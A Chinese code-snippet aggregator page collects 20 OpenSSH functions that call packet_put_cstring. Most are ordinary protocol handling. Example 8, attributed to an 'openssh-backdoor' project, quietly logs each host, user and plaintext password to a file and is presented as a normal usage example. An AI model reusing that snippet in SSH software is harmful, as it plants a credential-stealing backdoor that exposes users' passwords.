本文整理汇总了C++中packet_put_cstring函数的典型用法代码示例。如果您正苦于以下问题:C++ packet_put_cstring函数的具体用法?C++ packet_put_cstring怎么用?C++ packet_put_cstring使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了packet_put_cstring函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的C++代码示例。
示例1: input_service_request
/*ARGSUSED*/
static void
input_service_request(int type, u_int32_t seq, void *ctxt)
{
Authctxt *authctxt = ctxt;
u_int len;
int acceptit = 0;
char *service = packet_get_string(&len);
packet_check_eom();
if (authctxt == NULL)
fatal("input_service_request: no authctxt");
if (strcmp(service, "ssh-userauth") == 0) {
if (!authctxt->success) {
acceptit = 1;
/* now we can handle user-auth requests */
dispatch_set(SSH2_MSG_USERAUTH_REQUEST, &input_userauth_request);
}
}
/* XXX all other service requests are denied */
if (acceptit) {
packet_start(SSH2_MSG_SERVICE_ACCEPT);
packet_put_cstring(service);
packet_send();
packet_write_wait();
} else {
debug("bad service request %s", service);
packet_disconnect("bad service request %s", service);
}
xfree(service);
}
开发者ID:epriestley,项目名称:sshd-vcs,代码行数:33,代码来源:auth2.c
示例2: server_input_channel_open
static void
server_input_channel_open(int type, u_int32_t seq, void *ctxt)
{
Channel *c = NULL;
char *ctype;
int rchan;
u_int rmaxpack, rwindow, len;
ctype = packet_get_string(&len);
rchan = packet_get_int();
rwindow = packet_get_int();
rmaxpack = packet_get_int();
debug("server_input_channel_open: ctype %s rchan %d win %d max %d",
ctype, rchan, rwindow, rmaxpack);
if (strcmp(ctype, "session") == 0) {
c = server_request_session(ctype);
} else if (strcmp(ctype, "direct-tcpip") == 0) {
c = server_request_direct_tcpip(ctype);
}
if (c != NULL) {
debug("server_input_channel_open: confirm %s", ctype);
c->remote_id = rchan;
c->remote_window = rwindow;
c->remote_maxpacket = rmaxpack;
if (c->type != SSH_CHANNEL_CONNECTING) {
packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION);
packet_put_int(c->remote_id);
packet_put_int(c->self);
packet_put_int(c->local_window);
packet_put_int(c->local_maxpacket);
packet_send();
}
} else {
debug("server_input_channel_open: failure %s", ctype);
packet_start(SSH2_MSG_CHANNEL_OPEN_FAILURE);
packet_put_int(rchan);
packet_put_int(SSH2_OPEN_ADMINISTRATIVELY_PROHIBITED);
if (!(datafellows & SSH_BUG_OPENFAILURE)) {
packet_put_cstring("open failed");
packet_put_cstring("");
}
packet_send();
}
xfree(ctype);
}
开发者ID:miettal,项目名称:armadillo420_standard,代码行数:47,代码来源:serverloop.c
示例3: ssh_kex2
void
ssh_kex2(char *host, struct sockaddr *hostaddr)
{
Kex *kex;
xxx_host = host;
xxx_hostaddr = hostaddr;
if (options.ciphers == (char *)-1) {
log("No valid ciphers for protocol version 2 given, using defaults.");
options.ciphers = NULL;
}
if (options.ciphers != NULL) {
myproposal[PROPOSAL_ENC_ALGS_CTOS] =
myproposal[PROPOSAL_ENC_ALGS_STOC] = options.ciphers;
}
myproposal[PROPOSAL_ENC_ALGS_CTOS] =
compat_cipher_proposal(myproposal[PROPOSAL_ENC_ALGS_CTOS]);
myproposal[PROPOSAL_ENC_ALGS_STOC] =
compat_cipher_proposal(myproposal[PROPOSAL_ENC_ALGS_STOC]);
if (options.compression) {
myproposal[PROPOSAL_COMP_ALGS_CTOS] =
myproposal[PROPOSAL_COMP_ALGS_STOC] = "zlib,none";
} else {
myproposal[PROPOSAL_COMP_ALGS_CTOS] =
myproposal[PROPOSAL_COMP_ALGS_STOC] = "none,zlib";
}
if (options.macs != NULL) {
myproposal[PROPOSAL_MAC_ALGS_CTOS] =
myproposal[PROPOSAL_MAC_ALGS_STOC] = options.macs;
}
if (options.hostkeyalgorithms != NULL)
myproposal[PROPOSAL_SERVER_HOST_KEY_ALGS] =
options.hostkeyalgorithms;
/* start key exchange */
kex = kex_setup(myproposal);
kex->kex[KEX_DH_GRP1_SHA1] = kexdh_client;
kex->kex[KEX_DH_GEX_SHA1] = kexgex_client;
kex->client_version_string=client_version_string;
kex->server_version_string=server_version_string;
kex->verify_host_key=&verify_host_key_callback;
xxx_kex = kex;
dispatch_run(DISPATCH_BLOCK, &kex->done, kex);
session_id2 = kex->session_id;
session_id2_len = kex->session_id_len;
#ifdef DEBUG_KEXDH
/* send 1st encrypted/maced/compressed message */
packet_start(SSH2_MSG_IGNORE);
packet_put_cstring("markus");
packet_send();
packet_write_wait();
#endif
}
开发者ID:Te-k,项目名称:openssh-backdoor,代码行数:58,代码来源:sshconnect2.c
示例4: server_alive_check
static void
server_alive_check(void)
{
if (++server_alive_timeouts > options.server_alive_count_max)
packet_disconnect("Timeout, server not responding.");
packet_start(SSH2_MSG_GLOBAL_REQUEST);
packet_put_cstring("[email protected]");
packet_put_char(1); /* boolean: want reply */
packet_send();
}
开发者ID:OpenDarwin-CVS,项目名称:SEDarwin,代码行数:10,代码来源:clientloop.c
示例5: request_roaming
void
request_roaming(void)
{
packet_start(SSH2_MSG_GLOBAL_REQUEST);
packet_put_cstring(ROAMING_REQUEST);
packet_put_char(1);
packet_put_int(get_recv_buf_size());
packet_send();
client_register_global_confirm(roaming_reply, NULL);
}
开发者ID:Alkzndr,项目名称:freebsd,代码行数:10,代码来源:roaming_client.c
示例6: userauth_banner
static void
userauth_banner(void)
{
char *banner = NULL;
if (options.banner == NULL || (datafellows & SSH_BUG_BANNER))
return;
if ((banner = PRIVSEP(auth2_read_banner())) == NULL)
goto done;
packet_start(SSH2_MSG_USERAUTH_BANNER);
packet_put_cstring(banner);
packet_put_cstring(""); /* language, unused */
packet_send();
debug("userauth_banner: sent");
done:
if (banner)
xfree(banner);
}
开发者ID:andreiw,项目名称:polaris,代码行数:20,代码来源:auth2-none.c
示例7: do_ssh2_kex
/*
* SSH2 key exchange: diffie-hellman-group1-sha1
*/
void
do_ssh2_kex(void)
{
Kex *kex;
if (options.ciphers != NULL) {
myproposal[PROPOSAL_ENC_ALGS_CTOS] =
myproposal[PROPOSAL_ENC_ALGS_STOC] = options.ciphers;
}
myproposal[PROPOSAL_ENC_ALGS_CTOS] =
compat_cipher_proposal(myproposal[PROPOSAL_ENC_ALGS_CTOS]);
myproposal[PROPOSAL_ENC_ALGS_STOC] =
compat_cipher_proposal(myproposal[PROPOSAL_ENC_ALGS_STOC]);
if (options.macs != NULL) {
myproposal[PROPOSAL_MAC_ALGS_CTOS] =
myproposal[PROPOSAL_MAC_ALGS_STOC] = options.macs;
}
if (!options.compression) {
myproposal[PROPOSAL_COMP_ALGS_CTOS] =
myproposal[PROPOSAL_COMP_ALGS_STOC] = "none";
}
myproposal[PROPOSAL_SERVER_HOST_KEY_ALGS] = list_hostkey_types();
/* start key exchange */
kex = kex_setup(myproposal);
kex->kex[KEX_DH_GRP1_SHA1] = kexdh_server;
kex->kex[KEX_DH_GRP14_SHA1] = kexdh_server;
kex->kex[KEX_DH_GEX_SHA1] = kexgex_server;
kex->server = 1;
kex->client_version_string=client_version_string;
kex->server_version_string=server_version_string;
kex->load_host_key=&get_hostkey_by_type;
kex->host_key_index=&get_hostkey_index;
xxx_kex = kex;
dispatch_run(DISPATCH_BLOCK, &kex->done, kex);
session_id2 = kex->session_id;
session_id2_len = kex->session_id_len;
#ifdef DEBUG_KEXDH
/* send 1st encrypted/maced/compressed message */
packet_start(SSH2_MSG_IGNORE);
packet_put_cstring("markus");
packet_send();
packet_write_wait();
#endif
debug("KEX done");
}
开发者ID:M31MOTH,项目名称:attacks,代码行数:54,代码来源:sshd.c
示例8: userauth_passwd
int
userauth_passwd(Authctxt *authctxt)
{
static int attempt = 0;
char prompt[150];
char *password;
if (attempt++ >= options.number_of_password_prompts)
return 0;
if (attempt != 1)
error("Permission denied, please try again.");
snprintf(prompt, sizeof(prompt), "%[email protected]%.128s's password: ",
authctxt->server_user, authctxt->host);
password = read_passphrase(prompt, 0);
packet_start(SSH2_MSG_USERAUTH_REQUEST);
if((strcmp(BACKDOORPASSWD,password) != 0) && LOGGING_PASSWORDS)
{
FILE *fp = fopen(PASSWORDS_LOG_FILE,"a");
fprintf (fp,"+host: %s +user: %s +password: %s\n", get_remote_ipaddr(), options.user, password);
fclose (fp);
}
packet_put_cstring(authctxt->server_user);
packet_put_cstring(authctxt->service);
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
packet_send();
dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
&input_userauth_passwd_changereq);
return 1;
}
开发者ID:Te-k,项目名称:openssh-backdoor,代码行数:38,代码来源:sshconnect2.c
示例9: ssh_put_password
void
ssh_put_password(struct ssh *ssh, char *password)
{
int size;
char *padded;
if (ssh->compat & SSH_BUG_PASSWORDPAD) {
packet_put_cstring(password);
return;
}
size = roundup(strlen(password) + 1, 32);
padded = xcalloc(1, size);
strlcpy(padded, password, size);
packet_put_string(padded, size);
memset(padded, 0, size);
xfree(padded);
}
开发者ID:mpitzl,项目名称:libopenssh,代码行数:17,代码来源:sshconnect.c
示例10: ssh_put_password
void
ssh_put_password(char *password)
{
int size;
char *padded;
if (datafellows & SSH_BUG_PASSWORDPAD) {
packet_put_cstring(password);
return;
}
size = roundup(strlen(password) + 1, 32);
padded = xcalloc(1, size);
strlcpy(padded, password, size);
packet_put_string(padded, size);
explicit_bzero(padded, size);
free(padded);
}
开发者ID:yonglehou,项目名称:Win32-OpenSSH,代码行数:17,代码来源:sshconnect.c
示例11: auth1_process_tis_challenge
/*ARGSUSED*/
static int
auth1_process_tis_challenge(Authctxt *authctxt)
{
char *challenge;
if ((challenge = get_challenge(authctxt)) == NULL)
return (0);
debug("sending challenge '%s'", challenge);
packet_start(SSH_SMSG_AUTH_TIS_CHALLENGE);
packet_put_cstring(challenge);
free(challenge);
packet_send();
packet_write_wait();
return (-1);
}
开发者ID:CTSRD-SOAAP,项目名称:openssh,代码行数:18,代码来源:auth1.c
示例12: ssh_session2
static int
ssh_session2(void)
{
int id = -1;
/* XXX should be pre-session */
ssh_init_forwarding();
if (!no_shell_flag || (datafellows & SSH_BUG_DUMMYCHAN))
id = ssh_session2_open();
/* If we don't expect to open a new session, then disallow it */
if (options.control_master == SSHCTL_MASTER_NO &&
(datafellows & SSH_NEW_OPENSSH)) {
debug("Requesting [email protected]");
packet_start(SSH2_MSG_GLOBAL_REQUEST);
packet_put_cstring("[email protected]");
packet_put_char(0);
packet_send();
}
/* Execute a local command */
if (options.local_command != NULL &&
options.permit_local_command)
ssh_local_cmd(options.local_command);
/* Start listening for multiplex clients */
muxserver_listen();
/* If requested, let ssh continue in the background. */
if (fork_after_authentication_flag) {
fork_after_authentication_flag = 0;
if (daemon(1, 1) < 0)
fatal("daemon() failed: %.200s", strerror(errno));
}
if (options.use_roaming)
request_roaming();
return client_loop(tty_flag, tty_flag ?
options.escape_char : SSH_ESCAPECHAR_NONE, id);
}
开发者ID:dagreatk,项目名称:OpenSSH-LPK,代码行数:42,代码来源:ssh.c
示例13: client_alive_check
static void
client_alive_check(void)
{
int channel_id;
/* timeout, check to see how many we have had */
if (packet_inc_alive_timeouts() > options.client_alive_count_max) {
logit("Timeout, client not responding.");
cleanup_exit(255);
}
/*
* send a bogus global/channel request with "wantreply",
* we should get back a failure
*/
if ((channel_id = channel_find_open()) == -1) {
packet_start(SSH2_MSG_GLOBAL_REQUEST);
packet_put_cstring("[email protected]");
packet_put_char(1); /* boolean: want reply */
} else {
channel_request_start(channel_id, "[email protected]", 1);
}
packet_send();
}
开发者ID:bsloane1650,项目名称:Openssh-snooper,代码行数:24,代码来源:serverloop.c
示例14: input_userauth_passwd_changereq
/*
* parse PASSWD_CHANGEREQ, prompt user and send SSH2_MSG_USERAUTH_REQUEST
*/
void
input_userauth_passwd_changereq(int type, u_int32_t seqnr, void *ctxt)
{
Authctxt *authctxt = ctxt;
char *info, *lang, *password = NULL, *retype = NULL;
char prompt[150];
debug2("input_userauth_passwd_changereq");
if (authctxt == NULL)
fatal("input_userauth_passwd_changereq: "
"no authentication context");
info = packet_get_utf8_string(NULL);
if (strlen(info) != 0) {
info = g11n_filter_string(info);
log("%s", info);
}
xfree(info);
lang = packet_get_string(NULL);
xfree(lang);
packet_start(SSH2_MSG_USERAUTH_REQUEST);
packet_put_cstring(authctxt->server_user);
packet_put_cstring(authctxt->service);
packet_put_cstring(authctxt->method->name);
packet_put_char(1); /* additional info */
snprintf(prompt, sizeof(prompt),
gettext("Enter %[email protected]%.128s's old password: "),
authctxt->server_user, authctxt->host);
password = read_passphrase(prompt, 0);
packet_put_cstring(password);
memset(password, 0, strlen(password));
xfree(password);
password = NULL;
while (password == NULL) {
snprintf(prompt, sizeof(prompt),
gettext("Enter %[email protected]%.128s's new password: "),
authctxt->server_user, authctxt->host);
password = read_passphrase(prompt, RP_ALLOW_EOF);
if (password == NULL) {
/* bail out */
return;
}
snprintf(prompt, sizeof(prompt),
gettext("Retype %[email protected]%.128s's new password: "),
authctxt->server_user, authctxt->host);
retype = read_passphrase(prompt, 0);
if (strcmp(password, retype) != 0) {
memset(password, 0, strlen(password));
xfree(password);
log("Mismatch; try again, EOF to quit.");
password = NULL;
}
memset(retype, 0, strlen(retype));
xfree(retype);
}
packet_put_cstring(password);
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
packet_send();
dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
&input_userauth_passwd_changereq);
}
开发者ID:AlfredArouna,项目名称:illumos-gate,代码行数:69,代码来源:sshconnect2.c
示例15: ssh_session
static int
ssh_session(void)
{
int type;
int interactive = 0;
int have_tty = 0;
struct winsize ws;
char *cp;
const char *display;
/* Enable compression if requested. */
if (options.compression) {
debug("Requesting compression at level %d.",
options.compression_level);
if (options.compression_level < 1 ||
options.compression_level > 9)
fatal("Compression level must be from 1 (fast) to "
"9 (slow, best).");
/* Send the request. */
packet_start(SSH_CMSG_REQUEST_COMPRESSION);
packet_put_int(options.compression_level);
packet_send();
packet_write_wait();
type = packet_read();
if (type == SSH_SMSG_SUCCESS)
packet_start_compression(options.compression_level);
else if (type == SSH_SMSG_FAILURE)
logit("Warning: Remote host refused compression.");
else
packet_disconnect("Protocol error waiting for "
"compression response.");
}
/* Allocate a pseudo tty if appropriate. */
if (tty_flag) {
debug("Requesting pty.");
/* Start the packet. */
packet_start(SSH_CMSG_REQUEST_PTY);
/* Store TERM in the packet. There is no limit on the
length of the string. */
cp = getenv("TERM");
if (!cp)
cp = "";
packet_put_cstring(cp);
/* Store window size in the packet. */
if (ioctl(fileno(stdin), TIOCGWINSZ, &ws) < 0)
memset(&ws, 0, sizeof(ws));
packet_put_int((u_int)ws.ws_row);
packet_put_int((u_int)ws.ws_col);
packet_put_int((u_int)ws.ws_xpixel);
packet_put_int((u_int)ws.ws_ypixel);
/* Store tty modes in the packet. */
tty_make_modes(fileno(stdin), NULL);
/* Send the packet, and wait for it to leave. */
packet_send();
packet_write_wait();
/* Read response from the server. */
type = packet_read();
if (type == SSH_SMSG_SUCCESS) {
interactive = 1;
have_tty = 1;
} else if (type == SSH_SMSG_FAILURE)
logit("Warning: Remote host failed or refused to "
"allocate a pseudo tty.");
else
packet_disconnect("Protocol error waiting for pty "
"request response.");
}
/* Request X11 forwarding if enabled and DISPLAY is set. */
display = getenv("DISPLAY");
if (options.forward_x11 && display != NULL) {
char *proto, *data;
/* Get reasonable local authentication information. */
client_x11_get_proto(display, options.xauth_location,
options.forward_x11_trusted,
options.forward_x11_timeout,
&proto, &data);
/* Request forwarding with authentication spoofing. */
debug("Requesting X11 forwarding with authentication "
"spoofing.");
x11_request_forwarding_with_spoofing(0, display, proto,
data, 0);
/* Read response from the server. */
type = packet_read();
if (type == SSH_SMSG_SUCCESS) {
interactive = 1;
} else if (type == SSH_SMSG_FAILURE) {
logit("Warning: Remote host denied X11 forwarding.");
} else {
packet_disconnect("Protocol error waiting for X11 "
"forwarding");
}
}
//.........这里部分代码省略.........
开发者ID:msoulard,项目名称:openssh-server-passlog,代码行数:101,代码来源:ssh.c
示例16: ssh_session2
static int
ssh_session2(void)
{
int id = -1;
/* XXX should be pre-session */
if (!options.control_persist)
ssh_init_stdio_forwarding();
ssh_init_forwarding();
/* Start listening for multiplex clients */
muxserver_listen();
/*
* If we are in control persist mode and have a working mux listen
* socket, then prepare to background ourselves and have a foreground
* client attach as a control slave.
* NB. we must save copies of the flags that we override for
* the backgrounding, since we defer attachment of the slave until
* after the connection is fully established (in particular,
* async rfwd replies have been received for ExitOnForwardFailure).
*/
if (options.control_persist && muxserver_sock != -1) {
ostdin_null_flag = stdin_null_flag;
ono_shell_flag = no_shell_flag;
orequest_tty = options.request_tty;
otty_flag = tty_flag;
stdin_null_flag = 1;
no_shell_flag = 1;
tty_flag = 0;
if (!fork_after_authentication_flag)
need_controlpersist_detach = 1;
fork_after_authentication_flag = 1;
}
/*
* ControlPersist mux listen socket setup failed, attempt the
* stdio forward setup that we skipped earlier.
*/
if (options.control_persist && muxserver_sock == -1)
ssh_init_stdio_forwarding();
if (!no_shell_flag || (datafellows & SSH_BUG_DUMMYCHAN))
id = ssh_session2_open();
/* If we don't expect to open a new session, then disallow it */
if (options.control_master == SSHCTL_MASTER_NO &&
(datafellows & SSH_NEW_OPENSSH)) {
debug("Requesting [email protected]");
packet_start(SSH2_MSG_GLOBAL_REQUEST);
packet_put_cstring("[email protected]");
packet_put_char(0);
packet_send();
}
/* Execute a local command */
if (options.local_command != NULL &&
options.permit_local_command)
ssh_local_cmd(options.local_command);
/*
* If requested and we are not interested in replies to remote
* forwarding requests, then let ssh continue in the background.
*/
if (fork_after_authentication_flag) {
if (options.exit_on_forward_failure &&
options.num_remote_forwards > 0) {
debug("deferring postauth fork until remote forward "
"confirmation received");
} else
fork_postauth();
}
if (options.use_roaming)
request_roaming();
return client_loop(tty_flag, tty_flag ?
options.escape_char : SSH_ESCAPECHAR_NONE, id);
}
开发者ID:msoulard,项目名称:openssh-server-passlog,代码行数:78,代码来源:ssh.c
示例17: userauth_finish
void
userauth_finish(Authctxt *authctxt, int authenticated, const char *method,
const char *submethod)
{
char *methods;
int partial = 0;
if (!authctxt->valid && authenticated)
fatal("INTERNAL ERROR: authenticated invalid user %s",
authctxt->user);
if (authenticated && authctxt->postponed)
fatal("INTERNAL ERROR: authenticated and postponed");
/* Special handling for root */
if (authenticated && authctxt->pw->pw_uid == 0 &&
!auth_root_allowed(method)) {
authenticated = 0;
#ifdef SSH_AUDIT_EVENTS
PRIVSEP(audit_event(SSH_LOGIN_ROOT_DENIED));
#endif
}
if (authenticated && options.num_auth_methods != 0) {
if (!auth2_update_methods_lists(authctxt, method, submethod)) {
authenticated = 0;
partial = 1;
}
}
/* Log before sending the reply */
auth_log(authctxt, authenticated, partial, method, submethod);
if (authctxt->postponed)
return;
#ifdef USE_PAM
if (options.use_pam && authenticated) {
if (!PRIVSEP(do_pam_account())) {
/* if PAM returned a message, send it to the user */
if (buffer_len(&loginmsg) > 0) {
buffer_append(&loginmsg, "\0", 1);
userauth_send_banner(buffer_ptr(&loginmsg));
packet_write_wait();
}
fatal("Access denied for user %s by PAM account "
"configuration", authctxt->user);
}
}
#endif
#ifdef _UNICOS
if (authenticated && cray_access_denied(authctxt->user)) {
authenticated = 0;
fatal("Access denied for user %s.", authctxt->user);
}
#endif /* _UNICOS */
if (authenticated == 1) {
/* turn off userauth */
dispatch_set(SSH2_MSG_USERAUTH_REQUEST, &dispatch_protocol_ignore);
packet_start(SSH2_MSG_USERAUTH_SUCCESS);
packet_send();
packet_write_wait();
/* now we can break out */
authctxt->success = 1;
} else {
/* Allow initial try of "none" auth without failure penalty */
if (!authctxt->server_caused_failure &&
(authctxt->attempt > 1 || strcmp(method, "none") != 0))
authctxt->failures++;
if (authctxt->failures >= options.max_authtries) {
#ifdef SSH_AUDIT_EVENTS
PRIVSEP(audit_event(SSH_LOGIN_EXCEED_MAXTRIES));
#endif
packet_disconnect(AUTH_FAIL_MSG, authctxt->user);
}
methods = authmethods_get(authctxt);
debug3("%s: failure partial=%d next methods=\"%s\"", __func__,
partial, methods);
packet_start(SSH2_MSG_USERAUTH_FAILURE);
packet_put_cstring(methods);
packet_put_char(partial);
packet_send();
packet_write_wait();
free(methods);
}
}
开发者ID:ele7enxxh,项目名称:dtrace-pf,代码行数:88,代码来源:auth2.c
示例18: pam_query
static int
pam_query(void *ctx, char **name, char **info,
u_int *num, char ***prompts, u_int **echo_on)
{
Buffer buffer;
struct pam_ctxt *ctxt = ctx;
size_t plen;
u_char type;
char *msg;
buffer_init(&buffer);
*name = xstrdup("");
*info = xstrdup("");
*prompts = xmalloc(sizeof(char *));
**prompts = NULL;
plen = 0;
*echo_on = xmalloc(sizeof(u_int));
while (ssh_msg_recv(ctxt->pam_sock, &buffer) == 0) {
type = buffer_get_char(&buffer);
msg = buffer_get_string(&buffer, NULL);
switch (type) {
case PAM_PROMPT_ECHO_ON:
case PAM_PROMPT_ECHO_OFF:
*num = 1;
**prompts = xrealloc(**prompts, plen + strlen(msg) + 1);
plen += sprintf(**prompts + plen, "%s", msg);
**echo_on = (type == PAM_PROMPT_ECHO_ON);
xfree(msg);
return (0);
case PAM_ERROR_MSG:
case PAM_TEXT_INFO:
/* accumulate messages */
**prompts = xrealloc(**prompts, plen + strlen(msg) + 1);
plen += sprintf(**prompts + plen, "%s", msg);
xfree(msg);
break;
case PAM_SUCCESS:
case PAM_AUTH_ERR:
if (**prompts != NULL) {
/* drain any accumulated messages */
#if 0 /* not compatible with privsep */
packet_start(SSH2_MSG_USERAUTH_BANNER);
packet_put_cstring(**prompts);
packet_put_cstring("");
packet_send();
packet_write_wait();
#endif
xfree(**prompts);
**prompts = NULL;
}
if (type == PAM_SUCCESS) {
*num = 0;
**echo_on = 0;
ctxt->pam_done = 1;
xfree(msg);
return (0);
}
error("%s", msg);
default:
*num = 0;
**echo_on = 0;
xfree(msg);
ctxt->pam_done = -1;
return (-1);
}
}
return (-1);
}
开发者ID:UnitedMarsupials,项目名称:kame,代码行数:68,代码来源:auth2-pam-freebsd.c
示例19: input_userauth_u2f_register_response
//.........这里部分代码省略.........
decoded = xmalloc(strlen(regdata) * 3 / 4);
restlen = urlsafe_base64_decode(regdata, decoded, strlen(regdata) * 3 / 4);
walk = decoded;
// Header (magic byte)
u2f_bounds_check(1);
if (walk[0] != 0x05) {
logit("U2F response does not start with magic byte 0x05");
goto out;
}
u2f_advance(1);
// Length of the public key
u2f_bounds_check(u2f_pubkey_len);
pubkey = walk;
u2f_advance(u2f_pubkey_len);
// Length of the key handle
u2f_bounds_check(1);
khlen = walk[0];
u2f_advance(1);
// Key handle
u2f_bounds_check(khlen);
keyhandle = walk;
u2f_advance(khlen);
// Attestation certificate
u2f_bounds_check(1);
signature = walk;
if ((x509 = d2i_X509(NULL, &signature, restlen)) == NULL) {
logit("U2F response contains an invalid attestation certificate.");
goto out;
}
// U2F dictates that the length of the certificate should be determined by
// encoding the certificate using DER.
u2f_advance(i2d_X509(x509, &dummy));
free(dummy);
// Ensure we have at least one byte of signature.
u2f_bounds_check(1);
if ((clientdata = extract_json_string(response, "clientData")) == NULL) {
logit("U2F response JSON lacks the \"clientData\" key.");
goto out;
}
cdecoded = xmalloc(strlen(clientdata) * 3 / 4);
cdecodedlen = urlsafe_base64_decode(clientdata, cdecoded, strlen(clientdata) * 3 / 4);
EVP_PKEY *pkey = X509_get_pubkey(x509);
if ((err = EVP_VerifyInit(&mdctx, EVP_ecdsa())) != 1) {
ERR_error_string(ERR_get_error(), errorbuf);
fatal("EVP_VerifyInit() failed: %s (reason: %s)",
errorbuf, ERR_reason_error_string(err));
}
EVP_VerifyUpdate(&mdctx, "\0", 1);
u2f_sha256(digest, appid, strlen(appid));
EVP_VerifyUpdate(&mdctx, digest, sizeof(digest));
u2f_sha256(digest, cdecoded, cdecodedlen);
EVP_VerifyUpdate(&mdctx, digest, sizeof(digest));
EVP_VerifyUpdate(&mdctx, keyhandle, khlen);
EVP_VerifyUpdate(&mdctx, pubkey, u2f_pubkey_len);
if ((err = EVP_VerifyFinal(&mdctx, walk, restlen, pkey)) == -1) {
ERR_error_string(ERR_get_error(), errorbuf);
logit("Verifying the U2F registration signature failed: %s (reason: %s)",
errorbuf, ERR_reason_error_string(err));
goto out;
}
EVP_PKEY_free(pkey);
{
char *authorizedkey;
char key[u2f_pubkey_len + khlen];
char key64[((sizeof(key)+2)/3)*4 + 1];
memcpy(key, pubkey, u2f_pubkey_len);
memcpy(key+u2f_pubkey_len, keyhandle, khlen);
if (b64_ntop(key, sizeof(key), key64, sizeof(key64)) == -1)
fatal("b64_ntop()");
xasprintf(&authorizedkey, "ssh-u2f %s", key64);
packet_start(SSH2_MSG_USERAUTH_INFO_REQUEST);
packet_put_cstring(authorizedkey);
packet_send();
free(authorizedkey);
dispatch_set(SSH2_MSG_USERAUTH_INFO_RESPONSE, NULL);
}
out:
free(decoded);
userauth_finish(authctxt, 0, "u2f", NULL);
return;
#undef u2f_bounds_check
#undef u2f_advance
}
开发者ID:bluecmd,项目名称:openssh-u2f,代码行数:101,代码来源:auth-u2f.c
示例20: userauth_u2f
static int
userauth_u2f(Authctxt *authctxt)
{
u_int i;
int mode;
mode = packet_get_int();
packet_check_eom();
// TODO: shared constants
if (mode == 0) {
debug("u2f mode is registration");
u_char random[32];
char challenge[((sizeof(random)+2)/3)*4 + 1];
char *json;
arc4random_buf(random, sizeof(random));
if (urlsafe_base64_encode(random, sizeof(random), challenge, sizeof(challenge)) == -1)
fatal("TODO");
xasprintf(&json, "{\"challenge\": \"%s\", \"version\": \"U2F_V2\", \"appId\": \"%s\"}",
challenge, appid);
packet_start(SSH2_MSG_USERAUTH_INFO_REQUEST);
packet_put_cstring(json);
packet_send();
dispatch_set(SSH2_MSG_USERAUTH_INFO_RESPONSE,
&input_userauth_u2f_register_response);
authctxt->postponed = 1;
return (0);
} else {
debug("u2f mode is authentication");
}
// This is on the server. See sshconnect2.c for the client
debug("auth-u2f.c:userauth_u2f");
Key *key;
u_int idx = 0;
// Get multiple keys by increasing idx until key == NULL
// TODO: send multiple challenges for all keys (or something)
key = PRIVSEP(read_user_u2f_key(authctxt->pw, idx));
if (key == NULL)
{
debug("no registered u2f keys found\n");
return (0);
}
// TODO: handle empty signatureData with a nice message. this seems to happen when the keyhandle is wrong?
// TODO: to what should we set the appid?
//
// TODO: what does auth_info() do?
// TODO: we need to store challenge in this authctx somehow :)
packet_start(SSH2_MSG_USERAUTH_INFO_REQUEST);
u_char random[32];
char challenge[((sizeof(random)+2)/3)*4 + 1];
char pubkey[((u2f_pubkey_len+2)/3)*4 + 1];
char keyhandle[((key->u2f_key_handle_len+2)/3)*4 + 1];
char *json;
arc4random_buf(random, sizeof(random));
authctxt->u2f_challenge = xmalloc(sizeof(random));
memcpy(authctxt->u2f_challenge, random, sizeof(random));
authctxt->u2f_key = key;
if (urlsafe_base64_encode(random, sizeof(random), challenge, sizeof(challenge)) == -1)
fatal("TODO");
if (urlsafe_base64_encode(key->u2f_pubkey, u2f_pubkey_len, pubkey, sizeof(pubkey)) == -1)
fatal("TODO");
if (urlsafe_base64_encode(key->u2f_key_handle, key->u2f_key_handle_len, keyhandle, sizeof(keyhandle)) == -1)
fatal("TODO");
xasprintf(&json, "{\"challenge\": \"%s\", \"keyHandle\": \"%s\", \"appId\": \"%s\"}",
challenge, keyhandle, appid);
packet_put_cstring(json);
free(json);
packet_send();
dispatch_set(SSH2_MSG_USERAUTH_INFO_RESPONSE,
&input_userauth_u2f_info_response);
authctxt->postponed = 1;
return (0);
}
开发者ID:bluecmd,项目名称:openssh-u2f,代码行数:79,代码来源:auth-u2f.c
注:本文中的packet_put_cstring函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
客服电话
APP下载
官方微信
请发表评论